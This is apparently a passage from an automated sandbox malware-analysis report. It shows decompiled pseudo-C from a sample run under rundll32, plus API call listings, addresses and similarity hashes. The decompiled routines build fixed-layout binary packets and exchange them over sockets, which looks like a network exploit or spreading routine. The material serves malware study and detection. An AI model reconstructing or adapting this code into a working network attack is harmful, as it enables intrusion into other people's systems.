                                                                                                                                                                                        				_t305 = __imp__#19;
                                                                                                                                                                                        				_push(_t293);
                                                                                                                                                                                        				_push(0x111c);
                                                                                                                                                                                        				_push(_v12);
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				if( *_t305() <= 0) {
                                                                                                                                                                                        					L25:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        					_t302 = _v16;
                                                                                                                                                                                        					goto L26;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_push(_t293);
                                                                                                                                                                                        				_push(0x51c);
                                                                                                                                                                                        				_push(_v12 + 0x111c);
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				if( *_t305() <= 0) {
                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t306 = __imp__#16;
                                                                                                                                                                                        				_push(_t293);
                                                                                                                                                                                        				_a12 = _t293;
                                                                                                                                                                                        				_push(0xffff);
                                                                                                                                                                                        				_push(_v8);
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_t235 =  *_t306(_a4);
                                                                                                                                                                                        					if(_t235 <= 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t264 = _v8;
                                                                                                                                                                                        					_a12 = _a12 + _t235;
                                                                                                                                                                                        					if( *((intOrPtr*)(_t264 + 9)) != 0) {
                                                                                                                                                                                        						goto L25;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_a12 >= 0x147b) {
                                                                                                                                                                                        						if(E007B2708(_t264, _t264, _t235, _a16) != 0) {
                                                                                                                                                                                        							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                        							 *((short*)( *_a8 + 0x22)) = _v32;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L25;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                        					_push(0xffff);
                                                                                                                                                                                        					_push(_t264);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L25;
                                                                                                                                                                                        			}
































































                                                                                                                                                                                        0x007b2c23
                                                                                                                                                                                        0x007b2c2b
                                                                                                                                                                                        0x007b2c32
                                                                                                                                                                                        0x007b2c35
                                                                                                                                                                                        0x007b2c39
                                                                                                                                                                                        0x007b2c3c
                                                                                                                                                                                        0x007b2c40
                                                                                                                                                                                        0x007b2c41
                                                                                                                                                                                        0x007b2c4e
                                                                                                                                                                                        0x007b2c54
                                                                                                                                                                                        0x007b2c65
                                                                                                                                                                                        0x007b2c67
                                                                                                                                                                                        0x007b2c6c
                                                                                                                                                                                        0x007b2dc3
                                                                                                                                                                                        0x007b2dcd
                                                                                                                                                                                        0x007b2dd3
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2dd3
                                                                                                                                                                                        0x007b2c79
                                                                                                                                                                                        0x007b2c89
                                                                                                                                                                                        0x007b2c90
                                                                                                                                                                                        0x007b2c9a
                                                                                                                                                                                        0x007b2ca0
                                                                                                                                                                                        0x007b2ca8
                                                                                                                                                                                        0x007b2cb3
                                                                                                                                                                                        0x007b2cb4
                                                                                                                                                                                        0x007b2cb7
                                                                                                                                                                                        0x007b2cc1
                                                                                                                                                                                        0x007b2cca
                                                                                                                                                                                        0x007b2ccc
                                                                                                                                                                                        0x007b2cd0
                                                                                                                                                                                        0x007b2cd7
                                                                                                                                                                                        0x007b2cda
                                                                                                                                                                                        0x007b2cdd
                                                                                                                                                                                        0x007b2ce1
                                                                                                                                                                                        0x007b2ce4
                                                                                                                                                                                        0x007b2ce8
                                                                                                                                                                                        0x007b2cee
                                                                                                                                                                                        0x007b2cf1
                                                                                                                                                                                        0x007b2cf6
                                                                                                                                                                                        0x007b2cf9
                                                                                                                                                                                        0x007b2d00
                                                                                                                                                                                        0x007b2d04
                                                                                                                                                                                        0x007b2d04
                                                                                                                                                                                        0x007b2d08
                                                                                                                                                                                        0x007b2d08
                                                                                                                                                                                        0x007b2d0b
                                                                                                                                                                                        0x007b2d0c
                                                                                                                                                                                        0x007b2d0c
                                                                                                                                                                                        0x007b2d0f
                                                                                                                                                                                        0x007b2d17
                                                                                                                                                                                        0x007b2d1c
                                                                                                                                                                                        0x007b2d1f
                                                                                                                                                                                        0x007b2d22
                                                                                                                                                                                        0x007b2d22
                                                                                                                                                                                        0x007b2d25
                                                                                                                                                                                        0x007b2d2b
                                                                                                                                                                                        0x007b2d2c
                                                                                                                                                                                        0x007b2d31
                                                                                                                                                                                        0x007b2d34
                                                                                                                                                                                        0x007b2d3b
                                                                                                                                                                                        0x007b2dae
                                                                                                                                                                                        0x007b2dba
                                                                                                                                                                                        0x007b2dc0
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2dc0
                                                                                                                                                                                        0x007b2d40
                                                                                                                                                                                        0x007b2d41
                                                                                                                                                                                        0x007b2d4b
                                                                                                                                                                                        0x007b2d4c
                                                                                                                                                                                        0x007b2d53
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2d55
                                                                                                                                                                                        0x007b2d5b
                                                                                                                                                                                        0x007b2d5c
                                                                                                                                                                                        0x007b2d64
                                                                                                                                                                                        0x007b2d65
                                                                                                                                                                                        0x007b2d83
                                                                                                                                                                                        0x007b2d86
                                                                                                                                                                                        0x007b2d8a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2d6a
                                                                                                                                                                                        0x007b2d6d
                                                                                                                                                                                        0x007b2d74
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2d7d
                                                                                                                                                                                        0x007b2d9b
                                                                                                                                                                                        0x007b2da6
                                                                                                                                                                                        0x007b2daa
                                                                                                                                                                                        0x007b2daa
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b2d9b
                                                                                                                                                                                        0x007b2d7f
                                                                                                                                                                                        0x007b2d81
                                                                                                                                                                                        0x007b2d82
                                                                                                                                                                                        0x007b2d82
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74654F20,?,007B4775), ref: 007B29BF
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B29C8
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001124,?,007B4775), ref: 007B29DC
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B29DF
                                                                                                                                                                                        • rand.MSVCRT ref: 007B29F0
                                                                                                                                                                                        • htons.WS2_32(00000050), ref: 007B2A25
                                                                                                                                                                                        • rand.MSVCRT ref: 007B2A7E
                                                                                                                                                                                        • rand.MSVCRT ref: 007B2A96
                                                                                                                                                                                        • send.WS2_32(00000000,00000000,00000054,00000000), ref: 007B2ABB
                                                                                                                                                                                        • recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 007B2AD2
                                                                                                                                                                                        • rand.MSVCRT ref: 007B2AE7
                                                                                                                                                                                        • htons.WS2_32(00001120), ref: 007B2B06
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000160,?,007B4775), ref: 007B2B6A
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B2B71
                                                                                                                                                                                        • htons.WS2_32(0000015C), ref: 007B2B90
                                                                                                                                                                                        • rand.MSVCRT ref: 007B2BBE
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000048,?,007B4775), ref: 007B2BD2
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B2BD9
                                                                                                                                                                                        • htons.WS2_32(00000044), ref: 007B2BF8
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001638,?,007B4775), ref: 007B2C58
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B2C5F
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B2C79
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B2C90
                                                                                                                                                                                        • htons.WS2_32(00000050), ref: 007B2C9A
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B2D17
                                                                                                                                                                                        • send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 007B2D37
                                                                                                                                                                                        • send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 007B2D4F
                                                                                                                                                                                        • recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 007B2D86
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,007B4775), ref: 007B2DB3
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,007B4775), ref: 007B2DBA
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,007B4775), ref: 007B2DC6
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2DCD
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,007B4775), ref: 007B2DD9
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2DE0
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,007B4775), ref: 007B2DE9
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2DF0
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,007B4775), ref: 007B2DFB
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2E02
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 2063504749-3175316637
                                                                                                                                                                                        • Opcode ID: 21765e663928116148297beb8eb9c2503cf50dbc249df58b9eb308c5fbeea9e6
                                                                                                                                                                                        • Instruction ID: 886a4db3e1d0bd02b5ccfe81fd80c0d3ed5b9483ce5770b2217225217052700d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 21765e663928116148297beb8eb9c2503cf50dbc249df58b9eb308c5fbeea9e6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EE1BE75600345EFEB249FA4CC89FAA7BB4FF48710F108159FA049B292E7B9D841CB59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                        			E007B3D0D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, short _a12, intOrPtr _a16, void* _a20, void** _a24, long _a28, void* _a32) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                        				short _t158;
                                                                                                                                                                                        				void* _t169;
                                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                                        				int _t176;
                                                                                                                                                                                        				void* _t184;
                                                                                                                                                                                        				signed short _t186;
                                                                                                                                                                                        				intOrPtr _t207;
                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                        				short _t219;
                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                        				intOrPtr* _t225;
                                                                                                                                                                                        				short _t227;
                                                                                                                                                                                        				short _t228;
                                                                                                                                                                                        				signed int _t229;
                                                                                                                                                                                        				intOrPtr* _t234;
                                                                                                                                                                                        				intOrPtr _t243;
                                                                                                                                                                                        				void* _t255;
                                                                                                                                                                                        				void* _t261;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t243 = __edx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t139 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v12 = _t139;
                                                                                                                                                                                        				if(_t139 == 0) {
                                                                                                                                                                                        					L24:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t261 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                                                        				if(_t261 == 0) {
                                                                                                                                                                                        					L23:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        					goto L24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *_t261 = 0x12;
                                                                                                                                                                                        				 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                                                                                                        				_t223 = HeapAlloc(GetProcessHeap(), 8, 0x3d);
                                                                                                                                                                                        				if(_t223 == 0) {
                                                                                                                                                                                        					L22:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t261);
                                                                                                                                                                                        					goto L23;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t225 =  *_a32;
                                                                                                                                                                                        				if(1 !=  *_t225) {
                                                                                                                                                                                        					 *(_t261 + 8) = 0x3c;
                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                        					asm("adc edx, [ecx+0x4c]");
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 9)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 0x11)) = _a16;
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 0x15)) = _a20;
                                                                                                                                                                                        					_t158 = _a28;
                                                                                                                                                                                        					asm("adc edx, 0x0");
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 0xd)) =  *((intOrPtr*)(_t225 + 0x4c));
                                                                                                                                                                                        					 *((char*)(_t223 + 0x21)) = 8;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x25)) = 8;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x29)) = 8;
                                                                                                                                                                                        					 *((short*)(_t223 + 0x2d)) = _t158;
                                                                                                                                                                                        					 *((short*)(_t223 + 0x31)) = _t158;
                                                                                                                                                                                        					 *((short*)(_t223 + 0x35)) = _t158;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x3b)) = 5;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					 *(_t261 + 8) = 0x30;
                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                        					asm("adc edx, [ecx+0x4c]");
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                                                                                                        					 *((intOrPtr*)(_t223 + 9)) = _a16;
                                                                                                                                                                                        					_t219 = _a28;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x15)) = 8;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x19)) = 8;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x1d)) = 8;
                                                                                                                                                                                        					 *((short*)(_t223 + 0x21)) = _t219;
                                                                                                                                                                                        					 *((short*)(_t223 + 0x25)) = _t219;
                                                                                                                                                                                        					 *((short*)(_t223 + 0x29)) = _t219;
                                                                                                                                                                                        					 *((char*)(_t223 + 0x2f)) = 5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t261 + 0x18) =  *(_t261 + 8);
                                                                                                                                                                                        				 *(_t261 + 0x20) =  *(_t225 + 0x53) & 0x000000ff;
                                                                                                                                                                                        				 *(_t261 + 0x25) = ( *(_t261 + 0x18) & 0x0000ffff) + 1;
                                                                                                                                                                                        				if(E007B3209(_t225, _a4,  *_a8,  *(_t225 + 0x30) & 0x0000ffff, _t261, _t223, ( *(_t261 + 0x18) & 0x0000ffff) + 1) == 0) {
                                                                                                                                                                                        					L21:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t223);
                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					Sleep(0x7d0);
                                                                                                                                                                                        					_t169 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                                                                                                        					_a20 = _t169;
                                                                                                                                                                                        					if(_t169 == 0) {
                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *((intOrPtr*)(_t169 + 8)) = 0x42e0;
                                                                                                                                                                                        					 *((intOrPtr*)(_t169 + 0x10)) = 0x42e0;
                                                                                                                                                                                        					 *_t169 = 0x13;
                                                                                                                                                                                        					 *(_t169 + 0x14) = 4;
                                                                                                                                                                                        					 *((intOrPtr*)(_t169 + 0x18)) = 0x4c;
                                                                                                                                                                                        					_t227 = 5;
                                                                                                                                                                                        					 *((short*)(_t169 + 0x25)) = _t227;
                                                                                                                                                                                        					 *((intOrPtr*)(_t169 + 4)) = 0x1000;
                                                                                                                                                                                        					 *((intOrPtr*)(_t169 + 0xc)) = 0x1000;
                                                                                                                                                                                        					_t228 = 7;
                                                                                                                                                                                        					 *((short*)(_t169 + 0x27)) = _t228;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosw");
                                                                                                                                                                                        					asm("stosb");
                                                                                                                                                                                        					 *((short*)(_t223 + 3)) = _a12;
                                                                                                                                                                                        					_t173 = rand();
                                                                                                                                                                                        					_t229 = 0x28;
                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                        					 *( *_a8 + 0x22) =  *( *_a8 + 0x22) + _t173 % _t229;
                                                                                                                                                                                        					_t253 = _a8;
                                                                                                                                                                                        					_t231 =  *( *_a8 + 0x22) & 0x0000ffff;
                                                                                                                                                                                        					_t176 = E007B32AF(_a4,  *_a8,  *( *_a8 + 0x22) & 0x0000ffff, _a20, _t223,  *(_a20 + 0x27) & 0x0000ffff);
                                                                                                                                                                                        					if(_t176 == 0) {
                                                                                                                                                                                        						memset(_t261, _t176, 0x27);
                                                                                                                                                                                        						 *_t261 = 0x12;
                                                                                                                                                                                        						_t184 = E007B3209(_t231, _a4,  *_t253,  *( *_a32 + 0x32) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff);
                                                                                                                                                                                        						if(_t184 != 0) {
                                                                                                                                                                                        							_t255 = _v12;
                                                                                                                                                                                        							__imp__#16(_a4, _t255, 0xffff, 0);
                                                                                                                                                                                        							if(_t184 > 0 &&  *((intOrPtr*)(_t255 + 9)) == 0) {
                                                                                                                                                                                        								_a28 = _a28 & 0x0000ffff;
                                                                                                                                                                                        								_t186 =  *(_t255 + 2) & 0x0000ffff;
                                                                                                                                                                                        								__imp__#9(_t186);
                                                                                                                                                                                        								if(_a28 + 8 <= (_t186 & 0x0000ffff)) {
                                                                                                                                                                                        									_t234 =  *_a32;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									asm("sbb eax, edx");
                                                                                                                                                                                        									 *((intOrPtr*)(_t234 + 0x48)) =  *((intOrPtr*)(_t255 + 0x4c)) - ( *(_t234 + 0x51) & 0x000000ff);
                                                                                                                                                                                        									 *((intOrPtr*)(_t234 + 0x4c)) =  *((intOrPtr*)(_v12 + 0x50));
                                                                                                                                                                                        									if(1 !=  *_t234) {
                                                                                                                                                                                        										 *(_t261 + 4) = 8;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										 *(_t261 + 4) = 4;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									 *(_t261 + 0xc) =  *(_t261 + 4);
                                                                                                                                                                                        									 *((intOrPtr*)(_t261 + 0x10)) = 0x48;
                                                                                                                                                                                        									 *(_t261 + 0x14) =  *(_t234 + 0x54) & 0x000000ff;
                                                                                                                                                                                        									 *(_t261 + 0x25) =  *(_t261 + 4) + 1;
                                                                                                                                                                                        									 *((intOrPtr*)(_t223 + 1)) =  *((intOrPtr*)(_t234 + 0x48));
                                                                                                                                                                                        									 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t234 + 0x4c));
                                                                                                                                                                                        									if(E007B3209(_t234, _a4,  *_a8,  *(_t234 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                                                        										Sleep(0x7d0);
                                                                                                                                                                                        										_push(2);
                                                                                                                                                                                        										asm("stosw");
                                                                                                                                                                                        										asm("stosb");
                                                                                                                                                                                        										 *(_t261 + 8) = 0;
                                                                                                                                                                                        										 *(_t261 + 0x18) = 0;
                                                                                                                                                                                        										_t207 =  *_a32;
                                                                                                                                                                                        										 *(_t261 + 4) = 0;
                                                                                                                                                                                        										 *(_t261 + 0xc) = 0;
                                                                                                                                                                                        										 *((intOrPtr*)(_t261 + 0x10)) = 0;
                                                                                                                                                                                        										 *(_t261 + 0x14) = 0;
                                                                                                                                                                                        										 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                                                                                                        										 *(_t261 + 0x20) =  *(_t207 + 0x59) & 0x000000ff;
                                                                                                                                                                                        										 *(_t261 + 0x25) =  *(_t261 + 8) + 1;
                                                                                                                                                                                        										 *((short*)(_t223 + 1)) =  *((intOrPtr*)(_t207 + 0x32));
                                                                                                                                                                                        										if(E007B3209( *(_t261 + 0x25) & 0x0000ffff, _a4,  *_a8,  *(_t207 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                                                        											Sleep(0x7d0);
                                                                                                                                                                                        											_t212 = HeapAlloc(GetProcessHeap(), 8, _a28);
                                                                                                                                                                                        											 *_a24 = _t212;
                                                                                                                                                                                        											if(_t212 != 0) {
                                                                                                                                                                                        												memcpy(_t212, _v12 + 0x54, _a28);
                                                                                                                                                                                        												_v5 = 1;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                                                                                                        					goto L21;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x007b3f98
                                                                                                                                                                                        0x007b3f98
                                                                                                                                                                                        0x007b3fab
                                                                                                                                                                                        0x007b3fae
                                                                                                                                                                                        0x007b3fb9
                                                                                                                                                                                        0x007b3fc2
                                                                                                                                                                                        0x007b3fc9
                                                                                                                                                                                        0x007b3fcf
                                                                                                                                                                                        0x007b3fed
                                                                                                                                                                                        0x007b3ff8
                                                                                                                                                                                        0x007b4000
                                                                                                                                                                                        0x007b4004
                                                                                                                                                                                        0x007b4006
                                                                                                                                                                                        0x007b4008
                                                                                                                                                                                        0x007b400b
                                                                                                                                                                                        0x007b4011
                                                                                                                                                                                        0x007b4015
                                                                                                                                                                                        0x007b4018
                                                                                                                                                                                        0x007b401b
                                                                                                                                                                                        0x007b401e
                                                                                                                                                                                        0x007b4021
                                                                                                                                                                                        0x007b402c
                                                                                                                                                                                        0x007b4035
                                                                                                                                                                                        0x007b403d
                                                                                                                                                                                        0x007b405c
                                                                                                                                                                                        0x007b4063
                                                                                                                                                                                        0x007b4075
                                                                                                                                                                                        0x007b407e
                                                                                                                                                                                        0x007b4082
                                                                                                                                                                                        0x007b408f
                                                                                                                                                                                        0x007b4097
                                                                                                                                                                                        0x007b4097
                                                                                                                                                                                        0x007b4082
                                                                                                                                                                                        0x007b405c
                                                                                                                                                                                        0x007b3fed
                                                                                                                                                                                        0x007b3f6d
                                                                                                                                                                                        0x007b3f40
                                                                                                                                                                                        0x007b3f24
                                                                                                                                                                                        0x007b40a7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b40ad

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74654F20,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?), ref: 007B3D2B
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D34
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 007B3D46
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D49
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3D63
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D66
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B4269,?,00000000,?,?,?), ref: 007B3E5B
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3E65
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3E68
                                                                                                                                                                                        • rand.MSVCRT ref: 007B3EC3
                                                                                                                                                                                        • memset.MSVCRT ref: 007B3EFC
                                                                                                                                                                                          • Part of subcall function 007B3209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E), ref: 007B3220
                                                                                                                                                                                          • Part of subcall function 007B3209: HeapAlloc.KERNEL32(00000000,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?), ref: 007B3227
                                                                                                                                                                                          • Part of subcall function 007B3209: htons.WS2_32(?), ref: 007B3246
                                                                                                                                                                                          • Part of subcall function 007B3209: memcpy.MSVCRT ref: 007B3276
                                                                                                                                                                                          • Part of subcall function 007B3209: send.WS2_32(?,00000000,?,00000000), ref: 007B3287
                                                                                                                                                                                          • Part of subcall function 007B3209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B329A
                                                                                                                                                                                          • Part of subcall function 007B3209: HeapFree.KERNEL32(00000000), ref: 007B32A1
                                                                                                                                                                                        • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 007B3F38
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007B3F5C
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 007B3FF8
                                                                                                                                                                                        • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 007B4063
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B406E
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B4075
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B408F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,007B4269,?,00000000,?,?), ref: 007B40A0
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40A7
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,007B4269,?,00000000,?,?), ref: 007B40B6
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40B9
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B40C2
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40C5
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B40D0
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B40D3
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
